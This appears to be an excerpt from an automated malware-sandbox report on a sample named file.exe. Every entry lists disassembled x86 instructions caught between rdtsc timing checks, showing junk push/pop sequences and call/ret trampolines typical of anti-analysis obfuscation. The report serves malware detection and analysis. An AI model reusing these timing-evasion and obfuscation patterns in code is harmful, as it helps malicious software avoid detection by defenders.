                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5775DB second address: 5775DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5775DF second address: 5775E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5775E3 second address: 57762C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a pop edi 0x0000000b jmp 00007F55E4D1D2DFh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F55E4D1D2D8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1E05h], ebx 0x00000032 push eax 0x00000033 push edi 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57672B second address: 576731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576731 second address: 5767B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edi, dword ptr [ebp+122D2AC1h] 0x00000011 or dword ptr [ebp+122D20F0h], edx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e xor dword ptr [ebp+122D1AF3h], ebx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F55E4D1D2D8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+12461DAEh] 0x0000004b mov eax, dword ptr [ebp+122D13C9h] 0x00000051 mov ebx, edx 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push esi 0x00000058 call 00007F55E4D1D2D8h 0x0000005d pop esi 0x0000005e mov dword ptr [esp+04h], esi 0x00000062 add dword ptr [esp+04h], 00000014h 0x0000006a inc esi 0x0000006b push esi 0x0000006c ret 0x0000006d pop esi 0x0000006e ret 0x0000006f mov edi, ebx 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577796 second address: 5777BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F55E4D05134h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5767B5 second address: 5767BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578518 second address: 57851C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5777BE second address: 5777C8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5767BA second address: 5767C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57851C second address: 5785AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F55E4D1D2DEh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F55E4D1D2D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 call 00007F55E4D1D2E1h 0x0000002e mov edi, edx 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F55E4D1D2D8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D17DEh], ebx 0x00000053 push 00000000h 0x00000055 mov edi, dword ptr [ebp+122D2D1Dh] 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F55E4D1D2DCh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57963C second address: 579688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F55E4D05128h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 and bl, 00000011h 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D19D0h], esi 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+122D3166h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F55E4D0512Ch 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579688 second address: 5796A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5796A4 second address: 5796AE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A711 second address: 57A791 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F55E4D1D2E8h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F55E4D1D2D8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b stc 0x0000002c mov ebx, dword ptr [ebp+122D217Bh] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F55E4D1D2D8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jnl 00007F55E4D1D2D6h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5798CC second address: 5798D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F55E4D05126h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CC6B second address: 57CC6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CEDF second address: 57CEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CEE5 second address: 57CF05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F55E4D1D2E3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CF05 second address: 57CF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CF09 second address: 57CF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CF0F second address: 57CF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57ED87 second address: 57ED8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580A70 second address: 580A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580A74 second address: 580ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 jmp 00007F55E4D1D2E0h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F55E4D1D2D8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 clc 0x0000002a mov ebx, dword ptr [ebp+122D1AF3h] 0x00000030 push 00000000h 0x00000032 mov bh, ch 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jnp 00007F55E4D1D2DCh 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581919 second address: 5819B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05139h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F55E4D05128h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F55E4D05128h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F55E4D05128h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c adc ebx, 7DD40C69h 0x00000062 add dword ptr [ebp+122D224Ah], edi 0x00000068 xchg eax, esi 0x00000069 jc 00007F55E4D05132h 0x0000006f jc 00007F55E4D0512Ch 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 582A85 second address: 582B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F55E4D1D2D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 je 00007F55E4D1D2D8h 0x00000017 mov bl, 1Eh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F55E4D1D2D8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 stc 0x00000036 call 00007F55E4D1D2DFh 0x0000003b mov ebx, dword ptr [ebp+122D2B09h] 0x00000041 pop ebx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F55E4D1D2D8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e call 00007F55E4D1D2E4h 0x00000063 mov edi, dword ptr [ebp+122D2D51h] 0x00000069 pop ebx 0x0000006a push eax 0x0000006b push ecx 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583A96 second address: 583AB9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05130h 0x00000008 jmp 00007F55E4D0512Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F55E4D0512Ch 0x00000018 jc 00007F55E4D05126h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586AD2 second address: 586AE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F55E4D1D2D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586AE4 second address: 586AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586CBA second address: 586CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586CBE second address: 586CD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F55E4D05130h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5946FC second address: 59470D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59470D second address: 594736 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F55E4D0512Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C8D4 second address: 59C8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C8D8 second address: 59C8F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F55E4D05126h 0x00000014 jo 00007F55E4D05126h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C8F2 second address: 59C8FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B63E second address: 59B644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B644 second address: 59B655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC39 second address: 59BC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD8D second address: 59BDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F55E4D1D2E9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BDAC second address: 59BDB6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D05126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BEE8 second address: 59BEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F55E4D1D2D6h 0x0000000c popad 0x0000000d push edi 0x0000000e jno 00007F55E4D1D2D6h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BEFD second address: 59BF07 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C302 second address: 59C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C45B second address: 59C479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F55E4D05139h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C5EB second address: 59C647 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F55E4D1D2D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F55E4D1D2E4h 0x00000013 ja 00007F55E4D1D2D6h 0x00000019 jmp 00007F55E4D1D2E3h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F55E4D1D2E4h 0x00000025 push edi 0x00000026 pop edi 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jnc 00007F55E4D1D2D6h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0191 second address: 5A01BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F55E4D05126h 0x0000000c popad 0x0000000d jns 00007F55E4D0513Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01BB second address: 5A01C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01C1 second address: 5A01EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F55E4D05126h 0x00000011 jg 00007F55E4D05126h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F55E4D0512Ah 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01EA second address: 5A01EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01EE second address: 5A01F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01F8 second address: 5A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01FC second address: 5A021E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F55E4D05134h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A34DF second address: 5A352B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F55E4D1D2E9h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F55E4D1D2E0h 0x00000017 popad 0x00000018 jmp 00007F55E4D1D2E5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A352B second address: 5A3530 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3D0 second address: 5AA3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F55E4D1D2D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8DDE second address: 5A8DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8DE4 second address: 5A8DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A91F6 second address: 5A91FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A91FA second address: 5A9200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9200 second address: 5A9213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F55E4D0512Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9213 second address: 5A9219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9219 second address: 5A9229 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F55E4D05126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9229 second address: 5A922F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A939A second address: 5A93A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93A2 second address: 5A93A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93A6 second address: 5A93AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93AA second address: 5A93BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jns 00007F55E4D1D2D6h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93BC second address: 5A93C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F55E4D05126h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9529 second address: 5A9532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9532 second address: 5A9538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9538 second address: 5A953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A96B3 second address: 5A96E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F55E4D05126h 0x00000015 jmp 00007F55E4D05133h 0x0000001a popad 0x0000001b js 00007F55E4D05132h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
